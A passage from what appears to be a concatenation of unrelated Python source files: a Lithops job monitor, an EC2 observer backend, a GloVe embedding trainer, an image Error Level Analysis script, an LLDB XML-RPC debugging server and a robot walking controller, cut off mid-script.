if self.should_run:
self.token_bucket_q.put('#')
def run(self):
logger.debug(f'ExecutorID {self.executor_id} | Starting RabbitMQ job monitor')
channel = self.connection.channel()
def callback(ch, method, properties, body):
call_status = json.loads(body.decode("utf-8"))
if call_status['type'] == '__init__':
self._tag_future_as_running(call_status)
elif call_status['type'] == '__end__':
self._generate_tokens(call_status)
self._tag_future_as_ready(call_status)
if self._all_ready() or not self.should_run:
ch.stop_consuming()
ch.close()
self._print_status_log()
logger.debug(f'ExecutorID {self.executor_id} | RabbitMQ job monitor finished')
channel.basic_consume(self.queue, callback, auto_ack=True)
threading.Thread(target=channel.start_consuming, daemon=True).start()
while not self._all_ready() or not self.futures:
# Format call_ids running, pending and done
self._print_status_log()
self._future_timeout_checker(self.futures)
time.sleep(2)
if not self.should_run:
break
class StorageMonitor(Monitor):
THREADPOOL_SIZE = 64
def __init__(self, executor_id, internal_storage, token_bucket_q, generate_tokens, config):
super().__init__(executor_id, internal_storage, token_bucket_q, generate_tokens, config)
self.monitoring_interval = config['monitoring_interval']
# vars for _generate_tokens
self.callids_running_worker = {}
self.callids_running_processed = set()
self.callids_done_processed = set()
# vars for _mark_status_as_running
self.callids_running_processed_timeout = set()
# vars for _mark_status_as_ready
self.callids_done_processed_status = set()
def stop(self):
"""
Stops the monitor thread
"""
self.should_run = False
def _tag_future_as_running(self, callids_running):
"""
Mark which futures are in running status based on callids_running
"""
current_time = time.time()
not_running_futures = [f for f in self.futures if not (f.running or f.ready or f.success or f.done)]
callids_running_to_process = callids_running - self.callids_running_processed_timeout
for f in not_running_futures:
for call in callids_running_to_process:
if f.invoked and (f.executor_id, f.job_id, f.call_id) == call[0]:
call_status = {'type': '__init__',
'activation_id': call[1],
'worker_start_tstamp': current_time}
f._set_running(call_status)
self.callids_running_processed_timeout.update(callids_running_to_process)
self._future_timeout_checker(self.futures)
def _tag_future_as_ready(self, callids_done):
"""
Mark which futures have a call_status ready to be downloaded
"""
not_ready_futures = [f for f in self.futures if not (f.ready or f.success or f.done)]
callids_done_to_process = callids_done - self.callids_done_processed_status
fs_to_query = []
ten_percent = int(len(self.futures) * (10 / 100))
if len(self.futures) - len(callids_done) <= max(10, ten_percent):
fs_to_query = not_ready_futures
else:
for f in not_ready_futures:
if (f.executor_id, f.job_id, f.call_id) in callids_done_to_process:
fs_to_query.append(f)
if not fs_to_query:
return
def get_status(f):
cs = self.internal_storage.get_call_status(f.executor_id, f.job_id, f.call_id)
f._status_query_count += 1
if cs:
if not self._check_new_futures(cs, f):
f._set_ready(cs)
return (f.executor_id, f.job_id, f.call_id)
else:
return None
try:
pool = cf.ThreadPoolExecutor(max_workers=self.THREADPOOL_SIZE)
call_ids_processed = set(pool.map(get_status, fs_to_query))
pool.shutdown()
except Exception:
pass
try:
call_ids_processed.remove(None)
except Exception:
pass
try:
self.callids_done_processed_status.update(call_ids_processed)
except Exception:
pass
def _generate_tokens(self, callids_running, callids_done):
"""
Method that generates new tokens
"""
if not self.generate_tokens or not self.should_run:
return
callids_running_to_process = callids_running - self.callids_running_processed
callids_done_to_process = callids_done - self.callids_done_processed
for call_id, worker_id in callids_running_to_process:
if worker_id not in self.workers:
self.workers[worker_id] = set()
self.workers[worker_id].add(call_id)
self.callids_running_worker[call_id] = worker_id
for callid_done in callids_done_to_process:
if callid_done in self.callids_running_worker:
worker_id = self.callids_running_worker[callid_done]
if worker_id not in self.callids_done_worker:
self.callids_done_worker[worker_id] = []
self.callids_done_worker[worker_id].append(callid_done)
for worker_id in self.callids_done_worker:
job_id = self.callids_done_worker[worker_id][0][1]
if job_id not in self.present_jobs:
continue
chunksize = self.job_chunksize[job_id]
if worker_id not in self.workers_done and \
len(self.callids_done_worker[worker_id]) == chunksize:
self.workers_done.append(worker_id)
if self.should_run:
self.token_bucket_q.put('#')
else:
break
self.callids_running_processed.update(callids_running_to_process)
self.callids_done_processed.update(callids_done_to_process)
def run(self):
"""
Run method
"""
logger.debug(f'ExecutorID {self.executor_id} - Starting Storage job monitor')
WAIT_DUR_SEC = self.monitoring_interval
while not self._all_ready() or not self.futures:
time.sleep(WAIT_DUR_SEC)
WAIT_DUR_SEC = self.monitoring_interval
if not self.should_run:
break
callids_running, callids_done = \
self.internal_storage.get_job_status(self.executor_id)
# verify if there are new callids_done and reduce the sleep
new_callids_done = callids_done - self.callids_done_processed_status
if len(new_callids_done) > 0:
WAIT_DUR_SEC = 0.5
# generate tokens and mark futures as running/done
self._generate_tokens(callids_running, callids_done)
self._tag_future_as_running(callids_running)
self._tag_future_as_ready(callids_done)
self._print_status_log()
logger.debug(f'ExecutorID {self.executor_id} - Storage job monitor finished')
class JobMonitor:
def __init__(self, executor_id, internal_storage, config=None):
self.executor_id = executor_id
self.internal_storage = internal_storage
self.config = config
self.backend = self.config['lithops']['monitoring'].lower() if config else 'storage'
self.token_bucket_q = queue.Queue()
self.monitor = None
self.MonitorClass = getattr(
lithops.monitor,
f'{self.backend.capitalize()}Monitor'
)
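# e.g. a 'storage' backend resolves to StorageMonitor and 'rabbitmq' to RabbitmqMonitor (both defined above)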
def start(self, fs, job_id=None, chunksize=None, generate_tokens=False):
if self.backend == 'storage':
mi = self.config['lithops'].get('monitoring_interval', MONITORING_INTERVAL)\
if self.config else MONITORING_INTERVAL
bk_config = {'monitoring_interval': mi}
else:
bk_config = self.config.get(self.backend)
if not self.monitor or not self.monitor.is_alive():
self.monitor = self.MonitorClass(
executor_id=self.executor_id,
internal_storage=self.internal_storage,
token_bucket_q=self.token_bucket_q,
generate_tokens=generate_tokens,
config=bk_config
)
self.monitor.start()
self.monitor.add_futures(fs, job_id, chunksize)
def stop(self):
if self.monitor and self.monitor.is_alive():
self.monitor.stop()
|
ec2_backend.py
|
import threading
import time
from ec2_observer.event_loop import XOSObserver
from ec2_observer.event_manager import EventListener
from xos.logger import Logger, logging
logger = Logger(level=logging.INFO)
class Backend:
def run(self):
try:
# start the ec2 observer
observer = XOSObserver()
observer_thread = threading.Thread(target=observer.run)
observer_thread.start()
# start the event listener
event_manager = EventListener(wake_up=observer.wake_up)
event_manager_thread = threading.Thread(target=event_manager.run)
event_manager_thread.start()
except:
logger.log_exc("Exception in child thread")
|
pyglove.py
|
import numpy as np
import multiprocessing as mp
import random
import functools
import ctypes
def glove_compute_and_update_grads(coo_list, Warr, Garr, shape, cost, count, x_max, alpha, initial_learning_rate):
Wall = np.frombuffer(Warr)
Wall = Wall.reshape(shape)
W = Wall[:,:,:-1]
B = Wall[:,:,-1]
Gall = np.frombuffer(Garr)
Gall = Gall.reshape(shape)
Gw = Gall[:,:,:-1]
Gb = Gall[:,:,-1]
cost.value = 0.0
count.value = 0
for wid_pair, val in coo_list: # cr is coo record of ((target_wid, context_wid), val)
wid_target, wid_context = wid_pair
diff = np.dot(W[0][wid_target],W[1][wid_context])
diff += B[0][wid_target] + B[1][wid_context] - np.log(val)
fdiff = diff if val > x_max else np.power(val/x_max, alpha) * diff
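# fdiff is the error scaled by the GloVe weighting f(x) = (x/x_max)^alpha for x <= x_max and 1 otherwise;
# the accumulated cost below uses 0.5 * fdiff^2 as a monitoring value rather than the canonical f(x) * diff^2 loss.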
if True in [ np.isnan(d) or np.isinf(d) for d in (diff, fdiff)]:
continue
cost.value += 0.5 * fdiff * fdiff
count.value += 1
grad_w0 = np.clip(fdiff*W[1][wid_context],-100,100) * initial_learning_rate # initial gradient
grad_w1 = np.clip(fdiff*W[0][wid_target],-100,100) * initial_learning_rate # initial gradient
upd_w0 = grad_w0 / np.sqrt(Gw[0][wid_target]) # adagrad adjustment
upd_w1 = grad_w1 / np.sqrt(Gw[1][wid_context]) # adagrad adjustment
Gw[0][wid_target] += np.square(grad_w0)
Gw[1][wid_context] += np.square(grad_w1)
if True not in [np.isnan(upd_val) or np.isinf(upd_val) for upd_val in (np.sum(upd_w0), np.sum(upd_w1))]:
W[0][wid_target] -= upd_w0
W[1][wid_context] -= upd_w1
upd_b0 = fdiff/np.sqrt(Gb[0][wid_target])
upd_b1 = fdiff/np.sqrt(Gb[1][wid_context])
Gb[0][wid_target] += np.square(fdiff)
Gb[1][wid_context] += np.square(fdiff)
if True not in [np.isnan(upd_val) or np.isinf(upd_val) for upd_val in (upd_b0, upd_b1)]:
B[0][wid_target] -= upd_b0
B[1][wid_context] -= upd_b1
class Glove(object):
"""
Class for GloVe word embeddings implemented only on python
"""
def __init__(self, sentences, num_component, min_count=1, max_vocab=0, window_size=15, distance_weighting=True, window_range=None):
self.num_component = num_component
self.check_sentences(sentences, window_range)
self.build_vocabulary(sentences, min_count, max_vocab)
if window_range is None: # cooccurrence counting based on window_size of integer, distance is 1 between adjacent words
self.count_cooccurrence(sentences, window_size, distance_weighting)
else:
self.count_cooccurrence_range(sentences, window_range, distance_weighting)
self.initialize_weights()
def check_sentences(self, sentences, window_range):
if window_range is None:
return
for sentence in sentences:
for word in sentence:
if type(word) is not tuple or len(word) != 2:
raise ValueError("word {0} is not acceptable to window range mode, need a pair of (str, float)".format(word))
def build_vocabulary(self, sentences, min_count=1, max_vocab=0):
word_dict = {}
for sentence in sentences:
for word in sentence:
if type(word) is tuple:
word = word[0]
if word_dict.get(word) is None:
word_dict[word] = 0
word_dict[word] += 1
self.word_count = [(w,c) for w,c in word_dict.items() if c >= min_count]
self.word_count.sort(key=functools.cmp_to_key(lambda lhs,rhs : rhs[1] - lhs[1] if rhs[1] != lhs[1] else -1 if lhs[0] < rhs[0] else 1 if lhs[0] > rhs[0] else 0))
if max_vocab > 0:
self.word_count = self.word_count[0:max_vocab]
self.word_to_wid = { wc[0]:i for i, wc in enumerate(self.word_count) }
self.wid_to_word = { i:wc[0] for i, wc in enumerate(self.word_count) }
self.shape = (2, len(self.word_count), self.num_component+1)
def count_cooccurrence(self, sentences, window_size, distance_weighting):
coo = {}
for sentence in sentences:
words = sentence
for ti, word in enumerate(sentence):
if self.word_to_wid.get(word) is None:
continue
wid_target = self.word_to_wid[word]
for ci in range(max(ti-window_size,0),ti): # for words left to target word within window
if self.word_to_wid.get(words[ci]) is None:
continue
wid_context = self.word_to_wid[words[ci]]
if wid_target == wid_context:
continue
key = (wid_target,wid_context)
if coo.get(key) is None:
coo[key] = 0.0
weight = 1.0/(ti-ci) if distance_weighting else 1.0
coo[key] += weight
rkey = (wid_context,wid_target)
if coo.get(rkey) is None:
coo[rkey] = 0.0
coo[rkey] += weight
self.coo_records = list(coo.items())
random.shuffle(self.coo_records)
def count_cooccurrence_range(self, sentences, window_range, distance_weighting):
coo = {}
for sentence in sentences:
words = sentence
lb_ci = 0
for ti, pair in enumerate(sentence):
word_target, word_target_value = pair
if self.word_to_wid.get(word_target) is None:
continue
wid_target = self.word_to_wid[word_target]
search_range = range(lb_ci,ti)
for ci in search_range:
word_context, word_context_value = words[ci]
if word_target_value - word_context_value > window_range:
lb_ci = ci+1
continue
if self.word_to_wid.get(word_context) is None:
continue
wid_context = self.word_to_wid[word_context]
if wid_target == wid_context:
continue
key = (wid_target,wid_context)
weight = (word_context_value - word_target_value + window_range)/window_range if distance_weighting else 1.0
if coo.get(key) is None:
coo[key] = 0.0
coo[key] += weight
rkey = (wid_context,wid_target)
if coo.get(rkey) is None:
coo[rkey] = 0.0
coo[rkey] += weight
self.coo_records = list(coo.items())
random.shuffle(self.coo_records)
def initialize_weights(self):
num_elem = int(np.prod(self.shape))
self.Warr = mp.RawArray(ctypes.c_double, num_elem)
Wall = np.frombuffer(self.Warr)
Wall[:] = (np.random.rand(len(Wall)) - 0.5)/self.num_component # a pair of word_vector and bias # (100+1)*2
Wall = Wall.reshape(*self.shape)
self.W = Wall[:,:,:-1]
self.B = Wall[:,:,-1]
self.Garr = mp.RawArray(ctypes.c_double, num_elem)
Gall = np.frombuffer(self.Garr)
Gall[:] = np.ones(len(Gall))
Gall = Gall.reshape(*self.shape)
self.Gw = Gall[:,:,:-1]
self.Gb = Gall[:,:,-1]
def fit(self, force_initialize=False, num_iteration=50, num_procs=8, x_max=100, alpha=0.75, learning_rate=0.05, verbose=False):
if verbose:
print("training parameters = {}".format(dict(locals())))
if force_initialize:
self.initialize_weights()
history = {'loss':[]}
coo_list = self.coo_records
for iter in range(num_iteration):
if verbose:
print("iteration # %d ... " % iter, end="")
cost_list = [mp.Value('d', 0.0) for i in range(num_procs)]
count_list = [mp.Value('i', 0) for i in range(num_procs)]
arguments = [ (coo_list[rank*len(coo_list)//num_procs:(rank+1)*len(coo_list)//num_procs], self.Warr, self.Garr, self.shape, cost_list[rank], count_list[rank], x_max, alpha, learning_rate) for rank in range(num_procs)]
procs = [mp.Process(target=glove_compute_and_update_grads, args=arguments[rank]) for rank in range(num_procs)]
[proc.start() for proc in procs]
[proc.join() for proc in procs]
cost = 0
count = 0
for i in range(num_procs):
cost += cost_list[i].value
count += count_list[i].value
history['loss'].append(cost/count)
if verbose:
print("loss = %f" % history['loss'][-1])
self.word_vector = self.W[0] + self.W[1]
return history
def most_similar(self, word, number=5):
wid = self.word_to_wid[word]
word_vec = self.word_vector[wid]
dst = (np.dot(self.word_vector, word_vec)
/ np.linalg.norm(self.word_vector, axis=1)
/ np.linalg.norm(word_vec))
word_ids = np.argsort(-dst)
return [(self.wid_to_word[x], dst[x]) for x in word_ids[:number] if x in self.wid_to_word][1:]
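# --- Added usage sketch (illustration only, not part of the original module) ---
# It assumes the Glove class above; the toy corpus and hyperparameters below are
# arbitrary placeholders chosen only to exercise fit() and most_similar().
if __name__ == "__main__":
    toy_sentences = [["the", "cat", "sat", "on", "the", "mat"],
                     ["the", "dog", "sat", "on", "the", "rug"]]
    model = Glove(toy_sentences, num_component=10, min_count=1, window_size=5)
    history = model.fit(num_iteration=5, num_procs=1, verbose=True)
    print(model.most_similar("cat", number=3))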
|
ela.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 31 14:19:23 2018
@author: opensource
"""
from __future__ import print_function
from PIL import Image, ImageChops, ImageEnhance
import sys, os
import threading
import argparse
parser = argparse.ArgumentParser(description="""
Performs Error Level Analysis over a directory of images
""")
parser.add_argument('--dir', dest='directory', required=True,
help='path to the directory containing the images')
parser.add_argument('--quality', dest='quality', type=int,
help='quality used by the JPEG compression algorithm',
default=90)
TMP_EXT = ".tmp_ela.jpg"
ELA_EXT = ".ela.png"
SAVE_REL_DIR = "generated"
threads = []
quality = 90
def ela(fname, orig_dir, save_dir):
"""
Generates an ELA image on save_dir.
Params:
fname: filename w/out path
orig_dir: origin path
save_dir: save path
"""
basename, ext = os.path.splitext(fname)
org_fname = os.path.join(orig_dir, fname)
tmp_fname = os.path.join(save_dir, basename + TMP_EXT)
ela_fname = os.path.join(save_dir, basename + ELA_EXT)
im = Image.open(org_fname)
im.save(tmp_fname, 'JPEG', quality=quality)
tmp_fname_im = Image.open(tmp_fname)
ela_im = ImageChops.difference(im, tmp_fname_im)
extrema = ela_im.getextrema()
max_diff = max([ex[1] for ex in extrema])
scale = 255.0/max_diff
ela_im = ImageEnhance.Brightness(ela_im).enhance(scale)
ela_im.save(ela_fname)
os.remove(tmp_fname)
def main():
global quality
args = parser.parse_args()
dirc = args.directory
quality = args.quality
ela_dirc = os.path.join(dirc, SAVE_REL_DIR)
print("Performing ELA on images at %s" % dirc)
if not os.path.exists(ela_dirc):
os.makedirs(ela_dirc)
for d in os.listdir(dirc):
if d.endswith(".jpg") or d.endswith(".jpeg"):
thread = threading.Thread(target=ela, args=[d, dirc, ela_dirc])
threads.append(thread)
thread.start()
for t in threads:
t.join()
print("Finished!")
print("Head to %s/%s to check the results!" % (dirc, SAVE_REL_DIR))
if __name__ == '__main__':
main()
else:
print("This should'nt be imported.", file=sys.stderr)
sys.exit(1)
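# Example invocation (a sketch; the directory path is hypothetical):
#   python ela.py --dir ./images --quality 85
# ELA images are written to <dir>/generated with the ".ela.png" suffix.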
|
lldb_server.py
|
#!/usr/bin/python
from __future__ import print_function
from SimpleXMLRPCServer import SimpleXMLRPCServer
import sys
import threading
if len(sys.argv) < 2:
print("Usage: {} <lldb_python_path> [port]".format(sys.argv[0]))
lldb_path = '/Library/Developer/Toolchains/swift-latest.xctoolchain/System/Library/PrivateFrameworks/LLDB.framework/Resources/Python'
port = 12597
# sys.exit(1)
elif len(sys.argv) == 2:
lldb_path = sys.argv[1]
port = 12597
elif len(sys.argv) == 3:
lldb_path = sys.argv[1]
port = int(sys.argv[2])
print("Running with Python module path {} on localhost:{}...".format(lldb_path, port))
sys.path.insert(1, lldb_path)
from lldb import *
server = None
target = None
process = None
stop_event_listener = None
out_event_listener = None
stdout_buffer = ""
stderr_buffer = ""
status = "unknown"
breakpoint_status = {}
lldb_handle = SBDebugger.Create()
lldb_handle.SetAsync(True)
# Internal
def _get_stop_reason(thread):
reason = thread.GetStopReason()
if reason == eStopReasonBreakpoint:
return "breakpoint"
elif reason == eStopReasonWatchpoint:
return "watchpoint"
elif reason == eStopReasonSignal:
return "signal"
elif reason == eStopReasonException:
return "exception"
elif reason == eStopReasonInvalid:
return "invalid"
elif reason == eStopReasonNone:
return "none"
elif reason == eStopReasonTrace:
return "trace"
elif reason == eStopReasonExec:
return "exec"
elif reason == eStopReasonPlanComplete:
return "plan_complete"
elif reason == eStopReasonThreadExiting:
return "thread_exit"
elif reason == eStopReasonInstrumentation:
return "instrumentation"
return "running"
def _get_status(process):
state = process.GetState()
if state == eStateInvalid:
return "invalid"
elif state == eStateUnloaded:
return "unloaded"
elif state == eStateConnected:
return "connected"
elif state == eStateAttaching:
return "attaching"
elif state == eStateDetached:
return "detached"
elif state == eStateSuspended:
return "suspended"
elif state == eStateLaunching:
return "launching"
elif state == eStateRunning:
return "running"
elif state == eStateStopped:
s = set()
for thread in process.threads:
s.add(_get_stop_reason(thread))
return "stopped," + (",".join(list(s)))
elif state == eStateStepping:
return "stepping"
elif state == eStateCrashed:
return "crashed"
elif state == eStateExited:
return "exited"
else:
return "unknown " + str(state)
def _stop_event():
global status
event = SBEvent()
broadcaster = process.GetBroadcaster()
while True:
if not stop_event_listener:
return
if stop_event_listener.WaitForEventForBroadcasterWithType(1, broadcaster, SBProcess.eBroadcastBitStateChanged, event):
status = _get_status(process)
def _output_event():
global stderr_buffer, stdout_buffer
event = SBEvent()
broadcaster = process.GetBroadcaster()
while True:
if not out_event_listener:
return
if out_event_listener.WaitForEventForBroadcasterWithType(1, broadcaster, SBProcess.eBroadcastBitSTDOUT | SBProcess.eBroadcastBitSTDERR, event):
if event.GetType() == 4:
result = process.GetSTDOUT(1024)
if result:
stdout_buffer += result
else:
stream = SBStream()
event.GetDescription(stream)
print("output event", stream.GetData())
print("stderr", process.GetSTDERR(1024))
def shutdown_server():
global server, out_event_listener, stop_event_listener
stop()
out_event_listener = None
stop_event_listener = None
SBDebugger.Destroy(lldb_handle)
server.server_close()
# load executable
def prepare(executable, params, environment, path, work_dir):
global target, process, stop_event_listener, out_event_listener, status
if not target:
target = lldb_handle.CreateTargetWithFileAndTargetTriple(executable, LLDB_ARCH_DEFAULT)
if not target:
raise Exception("Could not create target")
error = SBError()
process = target.Launch(lldb_handle.GetListener(), params, environment, None, None, None, work_dir, eLaunchFlagStopAtEntry, True, error)
if not error.Success():
raise Exception("Could not load target: " + str(error))
stop_event_listener = SBListener('stop_listener')
out_event_listener = SBListener('output_listener')
broadcaster = process.GetBroadcaster()
if not broadcaster.AddListener(stop_event_listener, SBProcess.eBroadcastBitStateChanged):
raise Exception("Could not add stop listener")
if not broadcaster.AddListener(out_event_listener, SBProcess.eBroadcastBitSTDOUT | SBProcess.eBroadcastBitSTDERR):
raise Exception("Could not add out listener")
threading.Thread(target=_stop_event, name='stop_event_listener', args=()).start()
threading.Thread(target=_output_event, name='output_event_listener', args=()).start()
status = _get_status(process)
# running, interrupting and stepping
def start():
global process
if not process:
raise Exception("No process to run")
error = process.Continue()
if not error.Success():
raise Exception("Could not continue: " + str(error))
def pause():
global process
if not process:
raise Exception("No process to pause")
error = process.Stop()
if not error.Success():
raise Exception("Could not continue: " + str(error))
def step_into():
global process
if not process:
raise Exception("No process to step")
thread = process.GetSelectedThread()
thread.StepInto()
def step_over():
global process
if not process:
raise Exception("No process to step")
thread = process.GetSelectedThread()
thread.StepOver()
def step_out():
global process
if not process:
raise Exception("No process to step")
thread = process.GetSelectedThread()
thread.StepOut()
def stop():
global process, stop_event_listener
if process:
error = process.Kill()
if not error.Success():
raise Exception("Could not stop: " + str(error))
process = None
# thread selection
def select_thread(id):
global process
if not process:
raise Exception("No process to work on")
return process.SetSelectedThreadByID(id)
def selected_thread():
global process
if not process:
raise Exception("No process to query")
thread = process.GetSelectedThread()
return _get_thread(thread)
# input/output to target
def get_stdout():
global stdout_buffer
buf = stdout_buffer
stdout_buffer = ""
return buf
def get_stderr():
global stderr_buffer
buf = stderr_buffer
stderr_buffer = ""
return buf
def push_stdin(data):
global process
if not process:
raise Exception("No process to send data to")
process.PutSTDIN(data)
# status and backtraces
def get_status():
global status
return status
def _get_backtrace(thread):
bt_frames = []
for frame in thread.frames:
addr = frame.GetPCAddress()
load_addr = addr.GetLoadAddress(target)
function = frame.GetFunction()
mod_name = frame.GetModule().GetFileSpec().GetFilename()
if function:
func_name = frame.GetFunctionName()
file_name = frame.GetLineEntry().GetFileSpec().fullpath
line_num = frame.GetLineEntry().GetLine()
col = frame.GetLineEntry().GetColumn()
inlined = frame.IsInlined()
args = {}
for variable in frame.get_arguments():
args[variable.GetName()] = variable.GetSummary()
bt_frames.append({
"address": str(load_addr), # number to big for rpc -.-
"module": mod_name,
"function": func_name,
"file": file_name,
"line": line_num,
"column": col,
"inlined": inlined,
"arguments": args
})
else:
symbol = frame.GetSymbol()
file_addr = addr.GetFileAddress()
start_addr = symbol.GetStartAddress().GetFileAddress()
symbol_name = symbol.GetName()
symbol_offset = file_addr - start_addr
bt_frames.append({
"address": str(load_addr), # number to big for rpc -.-
"module": mod_name,
"symbol": symbol_name,
"offset": str(symbol_offset), # number to big for rpc -.-
})
return bt_frames
def get_backtrace():
global process
if not process:
raise Exception("No process to get traces of")
bt = {}
for thread in process.threads:
bt[str(thread.GetThreadID())] = _get_thread(thread)
bt[str(thread.GetThreadID())]['bt'] = _get_backtrace(thread)
return bt
def get_backtrace_for_selected_thread():
global process
if not process:
raise Exception("No process to get traces of")
thread = process.GetSelectedThread()
bt = _get_thread(thread)
bt['bt'] = _get_backtrace(thread)
return bt
def _get_thread(thread):
selected_thread = process.GetSelectedThread()
selected = (thread.id == selected_thread.id)
return {
"id": str(thread.id),
"index": thread.idx,
"name": thread.name,
"queue": thread.queue,
"stop_reason": _get_stop_reason(thread),
"num_frames": thread.GetNumFrames(),
"selected": selected
}
def get_threads():
global process
if not process:
raise Exception("No process to query")
threads = []
for thread in process.threads:
threads.append(_get_thread(thread))
return threads
def get_arguments(thread_id, frame_index):
global process
if not process:
raise Exception("No process to query")
thread = process.GetThreadByID(int(thread_id))
frame = thread.frame[frame_index]
result = {}
for variable in frame.get_arguments():
result[variable.GetName()] = variable.GetSummary()
return result
def get_local_variables(thread_id, frame_index):
global process
if not process:
raise Exception("No process to query")
thread = process.GetThreadByID(int(thread_id))
frame = thread.frame[frame_index]
result = {}
for variable in frame.get_locals():
result[variable.GetName()] = str(variable.GetSummary())
for variable in frame.get_statics():
result[variable.GetName()] = str(variable.GetSummary())
return result
def get_all_variables(thread_id, frame_index):
global process
if not process:
raise Exception("No process to query")
thread = process.GetThreadByID(int(thread_id))
frame = thread.frame[frame_index]
result = {}
for variable in frame.get_all_variables():
result[variable.GetName()] = str(variable.GetSummary())
return result
# execute arbitrary command
def execute_lldb_command(command):
interpreter = lldb_handle.GetCommandInterpreter()
res = SBCommandReturnObject()
interpreter.HandleCommand(command, res)
return {
"succeeded": res.Succeeded(),
"output": res.GetOutput(),
"error": res.GetError()
}
# breakpoints
def get_breakpoints():
global target
if not target:
raise Exception("No target")
breakpoints = []
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
loc = bp.GetLocationAtIndex(0).GetAddress().GetLineEntry()
breakpoints.append({
"file": loc.file.fullpath,
"line": loc.GetLine(),
"enabled": bp.IsEnabled(),
"condition": bp.GetCondition(),
"ignore_count": bp.GetIgnoreCount(),
"id": bp.id
})
return breakpoints
def set_breakpoint(filename, line_number, condition, ignore_count):
global target
if not target:
raise Exception("No target")
bp = target.BreakpointCreateByLocation(filename, line_number)
if condition:
bp.SetCondition(condition)
if ignore_count:
bp.SetIgnoreCount(ignore_count)
return bp.id
def delete_breakpoint(id):
global target
if not target:
raise Exception("No target")
target.BreakpointDelete(id)
def enable_breakpoint(id):
global target
if not target:
raise Exception("No target")
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
if bp.id == id:
bp.SetEnabled(True)
break
def disable_breakpoint(id):
global target
if not target:
raise Exception("No target")
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
if bp.id == id:
bp.SetEnabled(False)
break
def disable_all_breakpoints():
global target
if not target:
raise Exception("No target")
target.DisableAllBreakpoints()
def enable_all_breakpoints():
global target
if not target:
raise Exception("No target")
target.EnableAllBreakpoints()
def delete_all_breakpoints():
global target
if not target:
raise Exception("No target")
target.DeleteAllBreakpoints()
def disable_breakpoints():
global target, breakpoint_status
if not target:
raise Exception("No target")
if len(breakpoint_status) > 0:
return
breakpoint_status = {}
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
breakpoint_status[str(bp.id)] = bp.IsEnabled()
disable_all_breakpoints()
def enable_breakpoints():
global target, breakpoint_status
if not target:
raise Exception("No target")
for i in xrange(0, target.GetNumBreakpoints()):
bp = target.GetBreakpointAtIndex(i)
if breakpoint_status[str(bp.id)]:
enable_breakpoint(bp.id)
breakpoint_status = {}
#
# XMLRPC server
#
server = SimpleXMLRPCServer(("localhost", port), logRequests=False, allow_none=True)
server.register_introspection_functions()
# kill server
server.register_function(shutdown_server)
# load executable
server.register_function(prepare)
# start/stop/pause/step
server.register_function(start)
server.register_function(pause)
server.register_function(step_into)
server.register_function(step_over)
server.register_function(step_out)
server.register_function(stop)
# thread info
server.register_function(get_threads)
server.register_function(select_thread)
server.register_function(selected_thread)
# input/output
server.register_function(get_stdout)
server.register_function(get_stderr)
server.register_function(push_stdin)
# status
server.register_function(get_status)
server.register_function(get_backtrace)
server.register_function(get_backtrace_for_selected_thread)
# exec command
server.register_function(execute_lldb_command)
# get variables
server.register_function(get_arguments)
server.register_function(get_local_variables)
server.register_function(get_all_variables)
# breakpoint handling
server.register_function(get_breakpoints)
server.register_function(set_breakpoint)
server.register_function(delete_breakpoint)
server.register_function(enable_breakpoint)
server.register_function(disable_breakpoint)
server.register_function(disable_all_breakpoints)
server.register_function(enable_all_breakpoints)
server.register_function(delete_all_breakpoints)
server.register_function(disable_breakpoints)
server.register_function(enable_breakpoints)
try:
server.serve_forever()
except KeyboardInterrupt:
shutdown_server()
sys.exit(0)
except Exception:
sys.exit(0)
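# Client-side sketch (an added illustration, not part of this file): the functions
# registered above can be driven over XML-RPC, e.g. from Python 2. The executable
# path, params, and working directory below are hypothetical placeholders.
#   import xmlrpclib
#   proxy = xmlrpclib.ServerProxy("http://localhost:12597")
#   proxy.prepare("/path/to/executable", [], [], "", ".")
#   proxy.start()
#   print(proxy.get_status())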
|
walk_front.py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import pypot.robot
import time
import json
import math
import sys
import threading
import queue
from serial import Serial
def dist(a,b):
return math.sqrt((a*a)+(b*b))
def get_y_rotation(x,y,z):
radians = math.atan2(x, dist(y,z))
return -math.degrees(radians)
def get_x_rotation(x,y,z):
radians = math.atan2(y, dist(x,z))
return math.degrees(radians)
def read_kbd_input(inputQueue):
print('Ready for keyboard input:')
while True:
inputQueue.put(sys.stdin.read(1))
def interp(a, x1, x2):
return x1+a*(x2-x1)
def interpInv(x, x1, x2):
return (x-x1)/(x2-x1)
def MGD(theta2):
c = math.cos(theta2)
s = math.sin(theta2)
xA = 0.0
yA = 0.047
xB = 0.094
yB = 0.000
L2 = 0.13350
L3 = 0.10522
L4 = 0.13269
L5 = 0.13287
xC = xB+L2*c
yC = yB+L2*s
AC = math.sqrt((xA-xC)**2+(yA-yC)**2)
AH = min((L4**2-L3**2+AC**2)/(2*AC),L4)
HD = math.sqrt(L4**2-AH**2)
xH = xA+AH*(xC-xA)/AC
yH = yA+AH*(yC-yA)/AC
xD = xH-HD*(yC-yA)/AC
yD = yH+HD*(xC-xA)/AC
xF = xC+L5*(xC-xD)/L3
yF = yC+L5*(yC-yD)/L3
return math.atan((yF-yC)/(xF-xC))*180.0/math.pi, math.atan(yF/xF)*180.0/math.pi
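# Note (added): MGD() appears to compute the direct geometric model of the leg
# linkage. Given the knee angle theta2 in radians (e.g. MGD(math.radians(45))),
# it returns two angles in degrees that the loop below combines as
# "aF - lF + ankleOffset" to set the ankle servo goal positions.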
lapin = pypot.robot.from_json('confLapinMarkIII.json')
PS = Serial('/dev/serial0',115200,timeout=0.1)
PS.flushInput()
info = {}
alpha = 0 # positive when the legs spread apart
theta = 0 # negative toward the front
aLc = 0 # rest at -40, extension at 30
aRc = 0 # rest at -40, extension at 30
ankleOffset = 5
compliant = True
speed = 100
state = 0
xLeft=0
xRight=0
KP = 10
KI = 5
rythme=1
srythme=10
inputQueue = queue.Queue()
inputThread = threading.Thread(target=read_kbd_input, args=(inputQueue,), daemon=True)
inputThread.start()
count = 0
last_update = time.time()
t0 = time.time()
while True:
if (inputQueue.qsize() > 0):
c = inputQueue.get()
if c=='q':
break
if c=='a':
state = -1
# measurements
# temperature measurement
temp = 0
for mot in lapin.motors:
temp = max(temp, mot.present_temperature)
if temp >60:
print("HOT!")
# read back the sensors
PS.write(b"A")
out = PS.readline()
try:
